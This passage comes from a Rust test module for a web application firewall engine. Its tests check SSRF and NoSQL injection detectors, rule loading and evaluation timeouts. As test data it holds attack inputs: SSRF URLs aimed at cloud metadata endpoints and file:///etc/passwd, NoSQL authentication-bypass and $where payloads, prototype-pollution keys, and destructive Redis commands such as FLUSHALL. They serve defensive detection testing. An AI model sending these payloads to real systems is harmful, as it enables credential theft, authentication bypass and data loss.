/// `ssrf_analyzer_score`.
#[test]
fn test_ssrf_analyzer_localhost() {
    const LOOPBACK_URLS: &[(&str, &str)] = &[
        // IPv4 localhost
        ("http://127.0.0.1/", "Should detect 127.0.0.1"),
        ("http://127.0.0.2/admin", "Should detect 127.0.0.x"),
        ("https://127.255.255.255:8080/", "Should detect 127.x.x.x"),
        // IPv6 localhost
        ("http://[::1]/", "Should detect ::1"),
        (
            "http://[0:0:0:0:0:0:0:1]/",
            "Should detect full IPv6 localhost",
        ),
    ];

    for &(url, why) in LOOPBACK_URLS {
        assert!(ssrf_analyzer_score(url) > 0, "{}", why);
    }
}
2824
/// Cloud metadata endpoints, by link-local IP and by hostname, must earn a
/// positive score from `ssrf_analyzer_score`.
#[test]
fn test_ssrf_analyzer_cloud_metadata() {
    // AWS/Azure/GCP metadata
    let metadata_urls = [
        (
            "http://169.254.169.254/latest/meta-data/",
            "Should detect AWS metadata endpoint",
        ),
        (
            "http://169.254.170.2/v2/credentials",
            "Should detect AWS ECS metadata",
        ),
        (
            "http://metadata.google.internal/",
            "Should detect GCP metadata hostname",
        ),
        (
            "http://metadata.azure.com/",
            "Should detect Azure metadata hostname",
        ),
    ];

    metadata_urls
        .iter()
        .for_each(|&(url, why)| assert!(ssrf_analyzer_score(url) > 0, "{}", why));
}
2846
/// URLs pointing into the private IPv4 ranges must earn a positive score from
/// `ssrf_analyzer_score`.
#[test]
fn test_ssrf_analyzer_private_ips() {
    const PRIVATE_URLS: &[(&str, &str)] = &[
        // 10.0.0.0/8
        ("http://10.0.0.1/internal", "Should detect 10.x.x.x"),
        ("http://10.255.255.255/", "Should detect 10.255.255.255"),
        // 192.168.0.0/16
        ("http://192.168.1.1/", "Should detect 192.168.x.x"),
        ("http://192.168.0.254:3000/", "Should detect with port"),
        // 172.16.0.0/12
        ("http://172.16.0.1/", "Should detect 172.16.x.x"),
        ("http://172.31.255.255/", "Should detect 172.31.x.x"),
    ];

    for &(url, why) in PRIVATE_URLS {
        assert!(ssrf_analyzer_score(url) > 0, "{}", why);
    }
}
2880
/// Non-HTTP URL schemes listed below must earn a positive score from
/// `ssrf_analyzer_score`.
#[test]
fn test_ssrf_analyzer_dangerous_schemes() {
    const SCHEME_URLS: &[(&str, &str)] = &[
        ("file:///etc/passwd", "Should detect file://"),
        ("gopher://internal:1234/", "Should detect gopher://"),
        ("dict://localhost:11211/", "Should detect dict://"),
        ("ldap://internal/", "Should detect ldap://"),
        ("expect://id", "Should detect expect://"),
        (
            "php://filter/convert.base64-encode",
            "Should detect php://",
        ),
        ("data:text/html,<script>", "Should detect data:"),
    ];

    for &(url, why) in SCHEME_URLS {
        assert!(ssrf_analyzer_score(url) > 0, "{}", why);
    }
}
2913
/// IPv4 targets wrapped in the IPv6-mapped `::ffff:` form must earn a positive
/// score from `ssrf_analyzer_score`.
#[test]
fn test_ssrf_analyzer_ipv6_mapped() {
    // True when the analyzer assigns the URL a positive score.
    let flagged = |url: &str| ssrf_analyzer_score(url) > 0;

    // IPv6-mapped localhost
    assert!(
        flagged("http://[::ffff:127.0.0.1]/"),
        "Should detect IPv6-mapped localhost"
    );
    // IPv6-mapped private IP
    assert!(
        flagged("http://[::ffff:192.168.1.1]/"),
        "Should detect IPv6-mapped private IP"
    );
    // IPv6-mapped cloud metadata
    assert!(
        flagged("http://[::ffff:169.254.169.254]/"),
        "Should detect IPv6-mapped metadata"
    );
}
2933
/// Loopback written as a single integer host (decimal or hex) must earn a
/// positive score from `ssrf_analyzer_score`.
#[test]
fn test_ssrf_analyzer_encoded_ip() {
    const INTEGER_HOSTS: &[(&str, &str)] = &[
        // Decimal localhost: 2130706433 = 127.0.0.1
        ("http://2130706433/", "Should detect decimal IP (127.0.0.1)"),
        // Hex localhost: 0x7f000001 = 127.0.0.1
        ("http://0x7f000001/", "Should detect hex IP (127.0.0.1)"),
    ];

    for &(url, why) in INTEGER_HOSTS {
        assert!(ssrf_analyzer_score(url) > 0, "{}", why);
    }
}
2948
/// Percent-encoded loopback URLs, single- and double-encoded, must earn a
/// positive score from `ssrf_analyzer_score`.
#[test]
fn test_ssrf_analyzer_url_encoded() {
    let encoded_urls = [
        // URL-encoded localhost
        ("http%3a%2f%2f127.0.0.1%2f", "Should detect URL-encoded SSRF"),
        // Double-encoded
        (
            "http%253a%252f%252f127.0.0.1",
            "Should detect double-encoded SSRF",
        ),
    ];

    for &(url, why) in encoded_urls.iter() {
        assert!(ssrf_analyzer_score(url) > 0, "{}", why);
    }
}
2963
/// Legitimate URLs and plain text must score exactly zero in
/// `ssrf_analyzer_score`.
#[test]
fn test_ssrf_analyzer_false_positives() {
    const HARMLESS: &[(&str, &str)] = &[
        // Public IPs and ordinary domains
        ("http://8.8.8.8/", "Should not flag public IP"),
        ("https://google.com/", "Should not flag domain"),
        ("http://example.com/api/data", "Should not flag normal URL"),
        // Normal content
        ("user submitted text", "Should not flag normal text"),
        (
            "192.168.1.1 is a private IP",
            "Should not flag IP without URL context",
        ),
    ];

    for &(input, why) in HARMLESS {
        assert!(ssrf_analyzer_score(input) == 0, "{}", why);
    }
}
2990
2991    // ==================== NoSQL Injection Detection Tests ====================
2992
/// JSON bodies carrying MongoDB query operators must earn a positive score from
/// `nosql_analyzer_score`.
#[test]
fn test_nosql_analyzer_mongo_operators() {
    // MongoDB operators
    const OPERATOR_BODIES: &[(&str, &str)] = &[
        (
            r#"{"username": {"$ne": null}}"#,
            "Should detect $ne operator",
        ),
        (r#"{"age": {"$gt": 18}}"#, "Should detect $gt operator"),
        (
            r#"{"name": {"$regex": ".*"}}"#,
            "Should detect $regex operator",
        ),
        (
            r#"{"$or": [{"a": 1}, {"b": 2}]}"#,
            "Should detect $or operator",
        ),
    ];

    for &(body, why) in OPERATOR_BODIES {
        assert!(nosql_analyzer_score(body) > 0, "{}", why);
    }
}
3014
/// `$where` clauses carrying JavaScript (HIGH RISK) must earn a positive score
/// from `nosql_analyzer_score`.
#[test]
fn test_nosql_analyzer_where_js() {
    // $where with embedded JavaScript (CRITICAL)
    let where_bodies = [
        (
            r#"{"$where": "function() { return true; }"}"#,
            "Should detect $where with function",
        ),
        (
            r#"{"$where": "this.password == 'test'"}"#,
            "Should detect $where with this keyword",
        ),
        (
            r#"{"$where": "sleep(5000)"}"#,
            "Should detect $where with sleep (DoS)",
        ),
    ];

    where_bodies
        .iter()
        .for_each(|&(body, why)| assert!(nosql_analyzer_score(body) > 0, "{}", why));
}
3032
/// Operator-based authentication bypass bodies must earn a positive score from
/// `nosql_analyzer_score`.
#[test]
fn test_nosql_analyzer_auth_bypass() {
    // Authentication bypass patterns
    const BYPASS_BODIES: &[(&str, &str)] = &[
        (
            r#"{"password": {"$ne": ""}}"#,
            "Should detect password $ne bypass",
        ),
        (
            r#"{"username": "admin", "password": {"$gt": ""}}"#,
            "Should detect password $gt bypass",
        ),
        (
            r#"{"user": {"$exists": true}}"#,
            "Should detect user $exists bypass",
        ),
    ];

    for &(body, why) in BYPASS_BODIES {
        assert!(nosql_analyzer_score(body) > 0, "{}", why);
    }
}
3050
/// Prototype-pollution keys (`__proto__`, `constructor`, `prototype`) must earn
/// a positive score from `nosql_analyzer_score`.
#[test]
fn test_nosql_analyzer_proto_pollution() {
    // True when the analyzer assigns the body a positive score.
    let flagged = |body: &str| nosql_analyzer_score(body) > 0;

    // Prototype pollution (can lead to RCE)
    assert!(
        flagged(r#"{"__proto__": {"isAdmin": true}}"#),
        "Should detect __proto__ pollution"
    );
    assert!(
        flagged(r#"{"constructor": {"prototype": {}}}"#),
        "Should detect constructor pollution"
    );
    assert!(
        flagged(r#"{"prototype": {"polluted": true}}"#),
        "Should detect direct prototype pollution"
    );
}
3068
/// CouchDB special endpoint paths must earn a positive score from
/// `nosql_analyzer_score`.
#[test]
fn test_nosql_analyzer_couchdb() {
    const COUCH_PATHS: &[(&str, &str)] = &[
        ("/_all_docs", "Should detect _all_docs endpoint"),
        (
            "/_design/mydesign/_view/myview",
            "Should detect _design/_view endpoints",
        ),
        ("/_changes?since=0", "Should detect _changes endpoint"),
    ];

    for &(path, why) in COUCH_PATHS {
        assert!(nosql_analyzer_score(path) > 0, "{}", why);
    }
}
3085
/// Dangerous Redis commands must earn a positive score from
/// `nosql_analyzer_score`.
#[test]
fn test_nosql_analyzer_redis() {
    let redis_commands = [
        ("EVAL \"return 1\" 0", "Should detect EVAL command"),
        ("FLUSHALL", "Should detect FLUSHALL command"),
        ("CONFIG SET dir /tmp", "Should detect CONFIG command"),
        ("KEYS *", "Should detect KEYS command"),
    ];

    for &(command, why) in redis_commands.iter() {
        assert!(nosql_analyzer_score(command) > 0, "{}", why);
    }
}
3106
/// Percent-encoded NoSQL injection fragments must earn a positive score from
/// `nosql_analyzer_score`.
#[test]
fn test_nosql_analyzer_url_encoded() {
    const ENCODED_FRAGMENTS: &[(&str, &str)] = &[
        // URL-encoded "$where": pattern (%24 = $, %22 = ", %3A = :)
        (
            "%22%24where%22%3A",
            "Should detect URL-encoded \"$where\":",
        ),
        // URL-encoded {"password":{"$ne":""}} pattern
        (
            "%7B%22password%22%3A%7B%22%24ne%22%3A%22%22%7D%7D",
            "Should detect URL-encoded password $ne bypass",
        ),
        // URL-encoded __proto__
        ("%22__proto__%22%3A", "Should detect URL-encoded __proto__"),
    ];

    for &(fragment, why) in ENCODED_FRAGMENTS {
        assert!(nosql_analyzer_score(fragment) > 0, "{}", why);
    }
}
3126
/// Ordinary JSON documents and plain text must score exactly zero in
/// `nosql_analyzer_score`.
#[test]
fn test_nosql_analyzer_false_positives() {
    const HARMLESS: &[(&str, &str)] = &[
        // Normal JSON
        (
            r#"{"name": "John", "age": 30}"#,
            "Should not flag normal JSON",
        ),
        (
            r#"{"status": "active"}"#,
            "Should not flag simple key-value",
        ),
        // Normal text
        ("hello world", "Should not flag normal text"),
        ("user@example.com", "Should not flag email"),
    ];

    for &(input, why) in HARMLESS {
        assert!(nosql_analyzer_score(input) == 0, "{}", why);
    }
}
3149
/// Loads a single blocking rule that matches on the `User-Agent` header and
/// checks that a request carrying the offending value is blocked by rule 1.
#[test]
fn test_header_evaluation() {
    // Rule JSON is kept verbatim, including its inner whitespace.
    let rules = r#"[
            {
                "id": 1,
                "description": "Block bad user-agent",
                "risk": 10.0,
                "blocking": true,
                "matches": [
                    {"type": "header", "field": "User-Agent", "match": {"type": "contains", "match": "bad-bot"}}
                ]
            }
        ]"#;
    let mut engine = Engine::empty();
    engine.load_rules(rules.as_bytes()).unwrap();

    // The header value contains the "bad-bot" substring the rule looks for.
    let request = Request {
        method: "GET",
        path: "/",
        headers: vec![Header::new("User-Agent", "bad-bot/1.0")],
        ..Default::default()
    };
    let verdict = engine.analyze(&request);

    assert_eq!(verdict.action, Action::Block);
    assert!(verdict.matched_rules.contains(&1));
}
3176
3177    // ============ Timeout Tests ============
3178
/// `analyze_safe` on a simple matching request: rule 1 must match, and the
/// verdict must carry no timeout markers.
#[test]
fn test_analyze_safe_basic() {
    // Rule JSON is kept verbatim, including its inner whitespace.
    let rules = r#"[
            {
                "id": 1,
                "description": "Simple match",
                "risk": 10.0,
                "matches": [{"type": "uri", "match": {"type": "contains", "match": "test"}}]
            }
        ]"#;
    let mut engine = Engine::empty();
    engine.load_rules(rules.as_bytes()).unwrap();

    let request = Request {
        method: "GET",
        path: "/test",
        ..Default::default()
    };
    let verdict = engine.analyze_safe(&request);

    // Normal requests should complete without timeout
    assert!(!verdict.timed_out);
    assert!(verdict.rules_evaluated.is_none());
    assert!(verdict.matched_rules.contains(&1));
}
3203
/// `analyze_with_timeout` with a caller-supplied 100 ms budget must not report
/// a timeout for a simple request.
#[test]
fn test_analyze_with_timeout_custom() {
    // Rule JSON is kept verbatim, including its inner whitespace.
    let rules = r#"[
            {
                "id": 1,
                "description": "Simple match",
                "risk": 10.0,
                "matches": [{"type": "uri", "match": {"type": "contains", "match": "test"}}]
            }
        ]"#;
    let mut engine = Engine::empty();
    engine.load_rules(rules.as_bytes()).unwrap();

    let request = Request {
        method: "GET",
        path: "/test",
        ..Default::default()
    };
    let budget = Duration::from_millis(100);
    let verdict = engine.analyze_with_timeout(&request, budget);

    // Normal request should not timeout
    assert!(!verdict.timed_out);
}
3229
/// Sanity-checks the timeout constants: the maximum is not below the default
/// and does not exceed one second.
#[test]
fn test_timeout_cap() {
    // Upper bound used purely as a sanity check on the configured maximum.
    let sanity_ceiling = Duration::from_secs(1);

    assert!(DEFAULT_EVAL_TIMEOUT <= MAX_EVAL_TIMEOUT);
    assert!(MAX_EVAL_TIMEOUT <= sanity_ceiling);
}
3236
/// A default-constructed `Verdict` must report no timeout and no
/// evaluated-rule count.
#[test]
fn test_verdict_timeout_fields_default() {
    let pristine = Verdict::default();

    assert!(!pristine.timed_out);
    assert!(pristine.rules_evaluated.is_none());
}
3243
/// Exercises `EvalContext` deadline handling for three cases: no deadline, a
/// deadline in the future, and a deadline already in the past.
#[test]
fn test_eval_context_deadline() {
    let request = Request {
        method: "GET",
        path: "/test",
        ..Default::default()
    };

    // No deadline: nothing is stored and nothing can be exceeded.
    let unbounded = EvalContext::from_request(&request);
    assert!(unbounded.deadline.is_none());
    assert!(!unbounded.is_deadline_exceeded());

    // Deadline ten seconds ahead: stored, not yet exceeded.
    let pending =
        EvalContext::from_request_with_deadline(&request, Instant::now() + Duration::from_secs(10));
    assert!(pending.deadline.is_some());
    assert!(!pending.is_deadline_exceeded());

    // Deadline one millisecond behind: already exceeded.
    let lapsed =
        EvalContext::from_request_with_deadline(&request, Instant::now() - Duration::from_millis(1));
    assert!(lapsed.is_deadline_exceeded());
}
3268
/// Loading a rule whose regex is malformed must fail with
/// `WafError::RegexError`, and the error text must mention the bad pattern.
#[test]
fn test_load_rules_regex_error() {
    // Invalid regex (missing closing bracket). JSON kept verbatim.
    let rules = r#"[
            {
                "id": 1,
                "description": "Invalid regex",
                "risk": 10.0,
                "matches": [
                    {
                        "type": "uri",
                        "match": {
                            "type": "regex",
                            "match": "["
                        }
                    }
                ]
            }
        ]"#;
    let mut engine = Engine::empty();

    let outcome = engine.load_rules(rules.as_bytes());
    assert!(outcome.is_err());

    match outcome {
        Err(WafError::RegexError(detail)) => assert!(detail.contains("[")),
        unexpected => panic!("Expected RegexError, got {:?}", unexpected),
    }
}
3296}
synapse_pingora/waf/engine.rs

synapse_pingora/waf/
engine.rs